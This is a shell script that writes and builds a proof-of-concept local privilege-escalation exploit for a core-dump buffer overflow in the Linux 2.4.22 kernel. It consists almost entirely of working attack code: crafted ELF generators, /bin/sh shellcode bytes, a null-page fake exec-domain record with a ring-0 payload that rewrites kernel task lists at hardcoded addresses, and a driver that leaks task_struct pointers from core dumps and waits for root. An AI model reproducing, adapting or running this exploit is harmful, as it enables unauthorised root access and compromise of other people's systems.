#
####################################################
#
# Linux binfmt_elf core dump buffer overflow (PoC)
# (Kernel-2.4.22)
#
# 2006-04-30
# Written by :
# grip2
# airsupply
#
####################################################
## overflow.c
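# overflow.c re-execs itself with nine page-sized environment strings and then
# execs ./badelf with a page-sized argument, after raising RLIMIT_CORE, so that
# badelf's crash drives the vulnerable elf_core_dump() path with a crafted
# argument/environment layout.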
cat << __EOF__ > overflow.c
/*
* Written by :
* grip2
* airsupply
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/time.h>
#include <sys/resource.h>
#include <asm/page.h> /* PAGE_SIZE */
#ifndef PAGE_SIZE
#define PAGE_SIZE 4096
#endif
int main(int argc, char *argv[])
{
int esp;
struct rlimit rl;
int res;
int i;
char *env[10];
char page[PAGE_SIZE];
__asm__("movl %%esp, %0" : : "m"(esp));
printf("arg_start: %p arg_end: %p esp: %p\n",
argv[0], argv[argc-1]+strlen(argv[argc-1]), esp);
rl.rlim_cur = RLIM_INFINITY;
rl.rlim_max = RLIM_INFINITY;
res = setrlimit(RLIMIT_CORE, &rl);
if (res != 0) {
perror("setrlimit");
goto err;
}
memset(page, 'A', sizeof(page));
page[sizeof(page)-1] = 0;
for (i = 0; i < 9; i++)
env[i] = page;
env[i] = 0;
if (strcmp(argv[0], "SELF2") == 0) {
char *av[] = {"badelf", page, 0};
execve("badelf", av, NULL);
/* execve("test_elf", av, NULL); */
perror("execve: badelf");
goto err;
}
char *av[] = {"SELF2", 0};
execve(argv[0], av, env);
perror("execve self:");
goto err;
return 0;
err:
return 1;
}
__EOF__
## mkbadelf.c
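# mkbadelf.c writes ./badelf, a minimal 32-bit ET_EXEC ELF with two PT_LOAD
# segments: an RWX code segment at 0x08480000 whose entry point faults
# immediately (cli/hlt), and a second, inaccessible segment at 0xbfff8000,
# directly below the stack, giving the memory layout the core-dump overflow
# relies on.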
cat << __EOF__ > mkbadelf.c
/*
* Written by grip2
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <elf.h>
char sc[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
extern char test;
__asm__ (
"test:\n\t"
"cli \n\t"
"hlt \n\t"
"movl \$0xbffff000, %eax \n\t"
// "movl \$0x42, (%eax) \n\t"
"int3 \n\t"
);
int main()
{
#define ENTRY_OFFSET 4096
int fd = -1;
Elf32_Ehdr ehdr;
Elf32_Phdr phdr;
Elf32_Shdr shdr;
int i;
unsigned char code_align[4096];
unsigned char data_align[0x7000];
fd = open("badelf", O_WRONLY|O_CREAT|O_TRUNC, S_IRWXU);
if (fd == -1) {
perror("open badelf");
goto err;
}
memset(&ehdr, 0, sizeof(ehdr));
ehdr.e_ident[EI_MAG0] = 0x7f;
ehdr.e_ident[EI_MAG1] = 'E';
ehdr.e_ident[EI_MAG2] = 'L';
ehdr.e_ident[EI_MAG3] = 'F';
ehdr.e_ident[EI_CLASS] = ELFCLASS32;
ehdr.e_ident[EI_DATA] = ELFDATA2LSB;
ehdr.e_ident[EI_VERSION] = EV_CURRENT;
ehdr.e_type = ET_EXEC ;
ehdr.e_machine = EM_386;
ehdr.e_version = EV_CURRENT;
ehdr.e_ehsize = sizeof(Elf32_Ehdr);
ehdr.e_phentsize = sizeof(Elf32_Phdr);
ehdr.e_shentsize = sizeof(Elf32_Shdr);
ehdr.e_phnum = 2;
ehdr.e_phoff = sizeof(Elf32_Ehdr);
ehdr.e_shnum = 0;
ehdr.e_shoff = 0;
ehdr.e_shstrndx = 0;
ehdr.e_flags = 0;
ehdr.e_entry = 0x08480000 + ENTRY_OFFSET;
write(fd, &ehdr, sizeof(ehdr)); /* Elf header */
phdr.p_type = PT_LOAD;
phdr.p_offset = 0;
phdr.p_vaddr = 0x08480000;
phdr.p_paddr = phdr.p_vaddr;
phdr.p_filesz = ENTRY_OFFSET + sizeof(code_align);
phdr.p_memsz = ENTRY_OFFSET + sizeof(code_align);
phdr.p_flags = PF_R|PF_X|PF_W;
phdr.p_align = 0x1000;
write(fd, &phdr, sizeof(phdr)); /* Phdr header - PT_LOAD */
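/* second PT_LOAD: an inaccessible segment mapped at 0xbfff8000, right below the process stack */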
phdr.p_type = PT_LOAD;
phdr.p_offset = ENTRY_OFFSET + sizeof(code_align);
phdr.p_vaddr = 0xbfff8000;
phdr.p_paddr = phdr.p_vaddr;
phdr.p_filesz =sizeof(data_align);
phdr.p_memsz = sizeof(data_align);
phdr.p_flags = 0;
phdr.p_align = 0x1000;
write(fd, &phdr, sizeof(phdr)); /* Phdr header - PT_LOAD */
lseek(fd, ENTRY_OFFSET, SEEK_SET);
memset(code_align, '\x90', sizeof(code_align));
#if 1
//unsigned char int3 = 0xcc;
//memcpy(code_align, &int3, sizeof(int3));
memcpy(code_align, &test, 32);
#else
memcpy(code_align, sc, sizeof(sc));
#endif
write(fd, code_align, sizeof(code_align)); /* part of TEXT Segment */
memset(data_align, 'A', sizeof(data_align));
lseek(fd, ENTRY_OFFSET + sizeof(code_align), SEEK_SET);
write(fd, data_align, sizeof(data_align)); /* DATA Segment */
close(fd);
return 0;
err:
if (fd != -1)
close(fd);
return -1;
}
__EOF__
## mklcall.c
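# mklcall.c writes ./lcall, an ELF whose second PT_LOAD is mapped at virtual
# address 0. That zero page carries a fake exec-domain record (name pointer,
# syscall handler, scratch area, jump code, parent task pointer) followed by
# the ring-0 exploit() payload; the entry code installs a SIGSEGV handler and
# then issues the lcall7 call gate in an endless loop.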
cat << __EOF__ > mklcall.c
/*
* Written by :
* grip2
* airsupply
*/
#include <stdio.h>
#include <string.h>
#include <strings.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <signal.h>
#include <elf.h>
#include <asm/unistd.h>
#define g__syscall_return(type, res) \
do { \
if ((unsigned long)(res) >= (unsigned long)(-125)) { \
res = -1; \
} \
return (type) (res); \
} while (0)
#define g_syscall3(type,name,type1,arg1,type2,arg2,type3,arg3) \
type g_##name(type1 arg1,type2 arg2,type3 arg3) \
{ \
long __res; \
__asm__ volatile ("int \$0x80" \
: "=a" (__res) \
: "0" (__NR_##name),"b" ((long)(arg1)),"c" ((long)(arg2)), \
"d" ((long)(arg3))); \
g__syscall_return(type,__res); \
}
static inline g_syscall3(int, write, int, fd, const void *, buf, off_t, count)
char sc[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
void exploit_end(void);
struct list_head {
struct list_head *next, *prev;
};
struct task_struct {
/*
* offsets of these are hardcoded elsewhere - touch with care
*/
volatile long state; /* -1 unrunnable, 0 runnable, >0 stopped */
unsigned long flags; /* per process flags, defined below */
int sigpending;
unsigned long addr_limit; /* thread address space:
0-0xBFFFFFFF for user-thread
0-0xFFFFFFFF for kernel-thread
*/
struct exec_domain *exec_domain;
volatile long need_resched;
unsigned long ptrace;
int lock_depth; /* Lock depth */
/*
* offset 32 begins here on 32-bit platforms. We keep
* all fields in a single cacheline that are needed for
* the goodness() loop in schedule().
*/
long counter;
long nice;
unsigned long policy;
void *mm;
int processor;
/*
* cpus_runnable is ~0 if the process is not running on any
* CPU. It's (1 << cpu) if it's running on a CPU. This mask
* is updated under the runqueue lock.
*
* To determine whether a process might run on a CPU, this
* mask is AND-ed with cpus_allowed.
*/
unsigned long cpus_runnable, cpus_allowed;
/*
* (only the 'next' pointer fits into the cacheline, but
* that's just fine.)
*/
struct list_head run_list;
unsigned long sleep_time;
struct task_struct *next_task, *prev_task;
void *active_mm;
struct list_head local_pages;
unsigned int allocation_order, nr_local_pages;
/* task state */
void *binfmt;
int exit_code, exit_signal;
int pdeath_signal; /* The signal sent when the parent dies */
/* ??? */
unsigned long personality;
int did_exec:1;
unsigned task_dumpable:1;
pid_t pid;
pid_t pgrp;
pid_t tty_old_pgrp;
pid_t session;
pid_t tgid;
/* boolean value for session group leader */
int leader;
/*
* pointers to (original) parent process, youngest child, younger sibling,
* older sibling, respectively. (p->father can be replaced with
* p->p_pptr->pid)
*/
struct task_struct *p_opptr, *p_pptr, *p_cptr, *p_ysptr, *p_osptr;
struct list_head thread_group;
/* PID hash table linkage. */
struct task_struct *pidhash_next;
struct task_struct **pidhash_pprev;
struct list_head wait_chldexit; /* for wait4() */
};
static inline void __list_add(struct list_head *new,
struct list_head *prev,
struct list_head *next)
{
next->prev = new;
new->next = next;
new->prev = prev;
prev->next = new;
}
static inline void add_task_list(struct task_struct *head, struct task_struct *tsk)
{
tsk->next_task = head;
tsk->prev_task = head->prev_task;
head->prev_task->next_task = tsk;
head->prev_task = tsk;
}
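/* 2.4 keeps the task_struct at the bottom of each 8KB kernel stack, so the current task is found by masking the stack pointer with ~8191 */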
static inline struct task_struct * get_current(void)
{
struct task_struct *current;
__asm__("andl %%esp,%0; ":"=r" (current) : "0" (~8191UL));
return current;
}
void exploit_start(void) {}
void exploit()
{
__asm__ __volatile__ ("
nop
nop
jmp x1
nop
nop
nop
nop
nop
nop
x1:
cli ## must do
pusha
pushl %esp
popl %eax
sidt (%eax)
movl 2(%eax),%eax
xorl %ebx,%ebx
movb \$0xfb,%bl
rol \$0x3,%ebx
add %ebx,%eax
movw 6(%eax),%di
rol \$16,%edi
movw (%eax),%di
find_smp:
inc %edi
movb (%edi),%bl
cmpb \$0xe8,%bl
jnz find_smp
inc %edi
add (%edi),%edi
find:
dec %edi
movl (%edi),%eax
and \$0x0000ffff,%eax
cmpl \$0x00ec83,%eax
jnz find
aaaa:
jmp xxx
bback:
push %edi
ret
xxx:
call bback
bbbbbb:
cli ## must do
popa
nop
ret
");
{
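/*
 * Running in ring 0 now: reset the runqueue and the task list using
 * hardcoded 2.4.22 kernel addresses, then re-insert the parent, the
 * grandparent and a copy of the current task so the system keeps
 * scheduling afterwards.
 */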
struct list_head *runqueue_head;
struct task_struct *init_task;
struct task_struct *current, *parent, *copy_task;
int i;
runqueue_head = (void *) 0xc0335ec0;
init_task = (void *) 0xc037c000;
//__asm__ ("cli");
for(i = 0; i < 100000000; i++) /* wait a moment ... */
__asm__ __volatile__ ("nop");
__asm__ __volatile__ ("
movl (%1),%0;"
:"=r" (parent)
:"r" (20)); /* task pointer of parent */
copy_task = parent->p_cptr;
current = get_current();
runqueue_head->prev = runqueue_head;
runqueue_head->next = runqueue_head;
init_task->prev_task = init_task;
init_task->next_task = init_task;
/*
for (i = 0; i < 20; i++) {
tsk = find_task_by_pid(i);
if (tsk && tsk->state == 0) {
__list_add(&tsk->run_list, runqueue_head, runqueue_head->next);
add_task_list(&init_task, tsk);
}
}
*/
if (parent->state == 0) {
__list_add(&parent->run_list, runqueue_head, runqueue_head->next);
add_task_list(init_task, parent);
}
if (parent->p_pptr->state == 0) {
__list_add(&parent->p_pptr->run_list, runqueue_head, runqueue_head->next);
add_task_list(init_task, parent->p_pptr);
}
memcpy(current, copy_task, sizeof(struct task_struct));
__list_add(&current->run_list, runqueue_head, runqueue_head->next);
add_task_list(init_task, current);
/*
* current->p_opptr
* current->p_pptr
*/
current->p_cptr = NULL;
current->p_ysptr = NULL;
current->p_osptr = NULL;
current->pid = 65535;
current->state = -1;
current->need_resched = 1;
current->sigpending = 0;
}
#ifdef __TEST_LCALL__
i = 'A';
for (;;)
g_write(1, &i, 1);
for (;;) __asm__ __volatile__("hlt");
#endif
/* __asm__ ("sti"); */
}
/*
extern exploit;
__asm__ (
"exploit:\n\t"
"cli \n\t"
"hlt \n\t"
"int3 \n\t"
);
*/
void exploit_end(void) {}
static inline g_syscall3(int, sigaction, int, signum, const struct sigaction *, act,
struct sigaction *, oldact)
void lcall(void);
void lcall_end(void);
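/*
 * lcall(): install a SIGSEGV handler that returns into the loop below, then
 * issue the lcall7 call gate forever; the 2.4 kernel dispatches lcall7
 * through the task's exec_domain handler, which this exploit fakes in the
 * page mapped at virtual address 0.
 */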
void lcall(void)
{
struct sigaction old, new;
void *loop_addr;
__asm__ volatile (
"jmp get_loop_addr\n\t"
"ret_loop_addr:\n\t"
"popl %0\n\t"
:"=m" (loop_addr) :);
bzero(&new, sizeof(new));
new.sa_handler = loop_addr;
g_sigaction(SIGSEGV, &new, &old);
__asm__ volatile (
"jmp do_lcall;"
"get_loop_addr: "
"call ret_loop_addr;"
"ret;"
"do_lcall:"
);
while (1) {
__asm__ ("lcall \$0x7, \$0x0");
}
}
void lcall_end(void) {}
int main()
{
#define ENTRY_OFFSET 4096
int fd = -1;
Elf32_Ehdr ehdr;
Elf32_Phdr phdr;
Elf32_Shdr shdr;
int i;
unsigned char code_align[4096];
fd = open("lcall", O_WRONLY|O_CREAT|O_TRUNC, S_IRWXU);
if (fd == -1) {
perror("open lcall");
goto err;
}
memset(&ehdr, 0, sizeof(ehdr));
ehdr.e_ident[EI_MAG0] = 0x7f;
ehdr.e_ident[EI_MAG1] = 'E';
ehdr.e_ident[EI_MAG2] = 'L';
ehdr.e_ident[EI_MAG3] = 'F';
ehdr.e_ident[EI_CLASS] = ELFCLASS32;
ehdr.e_ident[EI_DATA] = ELFDATA2LSB;
ehdr.e_ident[EI_VERSION] = EV_CURRENT;
ehdr.e_type = ET_EXEC ;
ehdr.e_machine = EM_386;
ehdr.e_version = EV_CURRENT;
ehdr.e_ehsize = sizeof(Elf32_Ehdr);
ehdr.e_phentsize = sizeof(Elf32_Phdr);
ehdr.e_shentsize = sizeof(Elf32_Shdr);
ehdr.e_phnum = 2;
ehdr.e_phoff = sizeof(Elf32_Ehdr);
ehdr.e_shnum = 0;
ehdr.e_shoff = 0;
ehdr.e_shstrndx = 0;
ehdr.e_flags = 0;
ehdr.e_entry = 0x08480000 + ENTRY_OFFSET;
write(fd, &ehdr, sizeof(ehdr)); /* Elf header */
phdr.p_type = PT_LOAD;
phdr.p_offset = 0;
phdr.p_vaddr = 0x08480000;
phdr.p_paddr = phdr.p_vaddr;
phdr.p_filesz = ENTRY_OFFSET + sizeof(code_align);
phdr.p_memsz = ENTRY_OFFSET + sizeof(code_align);
phdr.p_flags = PF_R|PF_X|PF_W;
phdr.p_align = 0x1000;
write(fd, &phdr, sizeof(phdr)); /* Phdr header - PT_LOAD */
phdr.p_type = PT_LOAD;
phdr.p_offset = ENTRY_OFFSET + sizeof(code_align);
phdr.p_vaddr = 0x0;
phdr.p_paddr = phdr.p_vaddr;
phdr.p_filesz = sizeof(code_align);
phdr.p_memsz = sizeof(code_align);
phdr.p_flags = PF_R|PF_X|PF_W;
phdr.p_align = 0x1000;
write(fd, &phdr, sizeof(phdr)); /* Phdr header - PT_LOAD */
memset(code_align, '\x90', sizeof(code_align));
memcpy(code_align, lcall, (char *)lcall_end - (char *)lcall);
lseek(fd, ENTRY_OFFSET, SEEK_SET);
write(fd, code_align, sizeof(code_align)); /* part of TEXT Segment */
/* virtual address 0x00000000:
* [execdomain name pointer][handler for syscalls][stack & register save][jmp code][task pointer of parent])
* 4 4 8 4 4
*/
memset(code_align, '\x90', sizeof(code_align));
memcpy(code_align, "\x90\x90\xff\x25\x08\x00\x00\x00", 8); /* handler for syscalls */
// memcpy(code_align, "\x00\x00\x00\x00\x08\x00\x00\x00", 8); /* handler for syscalls */
memcpy(code_align+8, &exploit, (char *)exploit_end - (char *)exploit);
// memcpy(code_align, sc, sizeof(sc));
lseek(fd, ENTRY_OFFSET + sizeof(code_align), SEEK_SET);
write(fd, code_align, sizeof(code_align)); /* 0x0 Segment for lcall27 */
close(fd);
return 0;
err:
if (fd != -1)
close(fd);
return -1;
}
__EOF__
## kexp_coredump.c
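# kexp_coredump.c drives the attack: it repeatedly forks a child that
# dereferences NULL to produce core.<pid>, parses the NT_TASKSTRUCT note of
# that dump to learn the parent and sibling task_struct addresses, patches
# ./lcall with the parent task pointer, then launches ./lcall and ./overflow
# (which execs ./badelf) and polls /proc/interrupts while waiting for the
# kernel payload to run.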
cat << __EOF__ > kexp_coredump.c
/*
* Written by :
* grip2
* airsupply
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <signal.h>
#define BINELF_OVERFLOW "overflow"
#define BINELF_LCALL "lcall"
#include <sys/types.h>
#include <sys/wait.h>
#include <sys/time.h>
#include <sys/resource.h>
#include <elf.h>
void *first_o_task = NULL;
void *o_task, *y_task;
void *parent_task = NULL;
struct list_head {
struct list_head *next, *prev;
};
struct task_struct {
/*
* offsets of these are hardcoded elsewhere - touch with care
*/
volatile long state; /* -1 unrunnable, 0 runnable, >0 stopped */
unsigned long flags; /* per process flags, defined below */
int sigpending;
unsigned long addr_limit; /* thread address space:
0-0xBFFFFFFF for user-thread
0-0xFFFFFFFF for kernel-thread
*/
struct exec_domain *exec_domain;
volatile long need_resched;
unsigned long ptrace;
int lock_depth; /* Lock depth */
/*
* offset 32 begins here on 32-bit platforms. We keep
* all fields in a single cacheline that are needed for
* the goodness() loop in schedule().
*/
long counter;
long nice;
unsigned long policy;
void *mm;
int processor;
/*
* cpus_runnable is ~0 if the process is not running on any
* CPU. It's (1 << cpu) if it's running on a CPU. This mask
* is updated under the runqueue lock.
*
* To determine whether a process might run on a CPU, this
* mask is AND-ed with cpus_allowed.
*/
unsigned long cpus_runnable, cpus_allowed;
/*
* (only the 'next' pointer fits into the cacheline, but
* that's just fine.)
*/
struct list_head run_list;
unsigned long sleep_time;
struct task_struct *next_task, *prev_task;
void *active_mm;
struct list_head local_pages;
unsigned int allocation_order, nr_local_pages;
/* task state */
void *binfmt;
int exit_code, exit_signal;
int pdeath_signal; /* The signal sent when the parent dies */
/* ??? */
unsigned long personality;
int did_exec:1;
unsigned task_dumpable:1;
pid_t pid;
pid_t pgrp;
pid_t tty_old_pgrp;
pid_t session;
pid_t tgid;
/* boolean value for session group leader */
int leader;
/*
* pointers to (original) parent process, youngest child, younger sibling,
* older sibling, respectively. (p->father can be replaced with
* p->p_pptr->pid)
*/
struct task_struct *p_opptr, *p_pptr, *p_cptr, *p_ysptr, *p_osptr;
struct list_head thread_group;
/* PID hash table linkage. */
struct task_struct *pidhash_next;
struct task_struct **pidhash_pprev;
struct list_head wait_chldexit; /* for wait4() */
};
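/*
 * read_coredump(): walk the PT_NOTE segment of ./core.<pid> until the
 * NT_TASKSTRUCT (type 4) note, then pull the dumped task_struct out of it
 * to record the parent and sibling task pointers.
 */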
static int read_coredump(int pid)
{
char corefile[128];
char _task[0x1000];
int fd=-1;
int tmp_size;
int rd_len=0;
struct task_struct *ptask;
// task_struct *task_s;
Elf32_Ehdr ehdr;
Elf32_Phdr phdr;
Elf32_Nhdr nhdr;
memset(corefile,0,sizeof(corefile));
memset(_task,0,sizeof(_task));
sprintf(corefile,"./core.%d",pid);
printf("opening:%s\n",corefile);
if((fd=open(corefile,O_RDONLY))==-1)
{
perror("open coredump file:");
exit(-1);
}
// lseek(fd,sizeof(Elf32_Ehdr),SEEK_SET);
read(fd,&ehdr,sizeof(Elf32_Ehdr));
read(fd,&phdr,sizeof(Elf32_Phdr));
/*
printf("sizeof Elf32_Ehdr:%x\n",sizeof(Elf32_Ehdr));
printf("ehdr.e_phoff:%x\n",ehdr.e_phoff);
printf("ehdr.e_phnum:%x\n",ehdr.e_phnum);
printf("phdr.p_type:%x\n",phdr.p_type);
printf("phdr.p_offset:%x\n",phdr.p_offset);
printf("phdr.p_filesz:%x\n",phdr.p_filesz);
*/
//read Elf32_Nhdr elf_note
lseek(fd,phdr.p_offset,SEEK_SET);
while(1){
read(fd,&nhdr,sizeof(Elf32_Nhdr));
if(nhdr.n_type==0x4)
break;
// printf("%x\n",nhdr.n_descsz);
lseek(fd,nhdr.n_descsz+4,SEEK_CUR);
}
lseek(fd,4,SEEK_CUR);
rd_len=read(fd,&_task,nhdr.n_descsz);
ptask=(struct task_struct *)&_task;
// printf("pid: %d\n",ptask->pid);
y_task = ptask->p_ysptr;
o_task = ptask->p_osptr;
if (!first_o_task)
first_o_task = o_task;
if (!parent_task)
parent_task = ptask->p_pptr;
// printf("parent: %p\n", ptask->p_pptr);
close(fd);
return 0;
}
static int check_coredump(int pid)
{
int n;
if (read_coredump(pid) == -1)
return 0;
n = ((long) y_task - (long) first_o_task) / 8192;
printf("parent: %p overflow: %p lcall: %p [%d]\n",
parent_task, first_o_task, y_task, n);
if (n > 0 && n <= 10)
return 1;
return 0;
}
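/* make_coredump(): raise RLIMIT_CORE to unlimited and dereference NULL so the calling child dumps core */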
static void make_coredump()
{
struct rlimit rl;
int res;
rl.rlim_cur = RLIM_INFINITY;
rl.rlim_max = RLIM_INFINITY;
res = setrlimit(RLIMIT_CORE, &rl);
if (res != 0) {
perror("setrlimit");
return;
}
*(int *) 0 = 0;
}
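/* fix_lcall(): patch the on-disk ./lcall image; file offset 8192 maps to virtual address 0, so offset 8192+20 is the "task pointer of parent" slot that exploit() reads */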
static int fix_lcall()
{
int fd;
fd = open(BINELF_LCALL, O_RDWR);
if (fd == -1) {
perror("open "BINELF_LCALL);
return -1;
}
/* virtual address 0x00000000:
* [execdomain name pointer][handler for syscalls][stack & register save][jmp code][task pointer of parent])
* 4 4 8 4 4
*/
lseek(fd, 8192+4+4+8+4, SEEK_SET);
write(fd, &parent_task, sizeof(parent_task));
close(fd);
return 0;
}
int main(int argc, char *argv[])
{
int pipe_of[2] = {-1, -1};
int pipe_lcall[2] = {-1, -1};
int pipe_mcd[2] = {-1, -1};
int mcd_pid, lcall_pid, copy_pid;
int status;
int i;
if (pipe(pipe_of) == -1) {
perror("pipe overflow");
goto err;
}
if (pipe(pipe_mcd) == -1) {
perror("pipe make_coredump");
goto err;
}
if (pipe(pipe_lcall) == -1) {
perror("pipe_lcall");
goto err;
}
/* overflow process */
if (fork() == 0) {
char cmd[32];
if (read(pipe_of[0], cmd, sizeof(cmd)) == -1) {
perror("read pipe_of");
exit(1);
}
if (strncmp(cmd, "start", 5) == 0) {
char *p[] = {BINELF_OVERFLOW, cmd+5, 0};
execve(BINELF_OVERFLOW, p, 0);
perror(BINELF_OVERFLOW);
}
else if (strcmp(cmd, "stop") == 0) {
exit(0);
}
fprintf(stderr, "pipe_of command \"%s\" error!\n", cmd);
exit(1);
}
while (1) {
/* make coredump file process */
if ((mcd_pid = fork()) == 0) {
char cmd[8];
if (read(pipe_mcd[0], cmd, sizeof(cmd)) == -1) {
perror("read pipe_mcd");
exit(1);
}
if (strcmp(cmd, "start") == 0) {
make_coredump();
fprintf(stderr, "make coredump file failed!\n");
exit(1);
}
else if (strcmp(cmd, "stop") == 0) {
exit(0);
}
fprintf(stderr, "pipe_mcd command \"%s\" error!\n", cmd);
exit(1);
}
/* lcall process */
if ((lcall_pid = fork()) == 0) {
char cmd[8];
if (read(pipe_lcall[0], cmd, sizeof(cmd)) == -1) {
perror("read pipe_lcall");
exit(1);
}
if (strcmp(cmd, "start") == 0) {
char *p[] = {BINELF_LCALL, 0};
execve(BINELF_LCALL, p, 0);
perror(BINELF_LCALL);
exit(1);
}
else if (strcmp(cmd, "pause") == 0) {
pause();
exit(0);
}
else if (strcmp(cmd, "stop") == 0) {
exit(0);
}
fprintf(stderr, "pipe_lcall command \"%s\" error!\n", cmd);
exit(-1);
}
write(pipe_mcd[1], "start", 6);
sleep(1);
while (1) {
if (waitpid(mcd_pid, &status, 0) < 0)
break;
}
if (!check_coredump(mcd_pid)) {
write(pipe_lcall[1], "pause", 6);
system("rm -rf core.*");
continue;
}
break;
}
if (fix_lcall() == -1)
goto err;
if ((copy_pid = fork()) == 0) {
char *p[] = {"lcall", 0};
execve("lcall", p, 0);
perror("lcall");
while (1)
printf("panic ...\n");
}
write(pipe_lcall[1], "start", 6);
sleep(1);
kill(copy_pid, SIGSTOP);
printf("please press
getchar();
printf("exploiting, wait a moment ...\n");
char ofcmd[16];
sprintf(ofcmd, "start%d\0", lcall_pid);
write(pipe_of[1], ofcmd, strlen(ofcmd)+1);
FILE *fp;
char buf[256];
while(1) {
printf("******** in parent, waiting for root\n");
fp = fopen("/proc/interrupts","r");
while (!feof(fp)) {
fgets(buf, sizeof(buf), fp);
printf("%s", buf);
}
fclose(fp);
for(i = 0; i < 2000000000; i++);
}
return 0;
err:
if (pipe_lcall[0] != -1) {
close(pipe_lcall[0]);
close(pipe_lcall[1]);
}
if (pipe_mcd[0] != -1) {
close(pipe_mcd[0]);
close(pipe_mcd[1]);
}
if (pipe_of[1] != -1) {
close(pipe_of[0]);
close(pipe_of[1]);
}
return 1;
}
__EOF__
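# build the helpers, generate badelf and lcall, then run the driver
# (all binaries are expected in the current working directory)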
make kexp_coredump
make overflow
make mkbadelf
gcc mklcall.c -o mklcall -O2
./mkbadelf
./mklcall
./kexp_coredump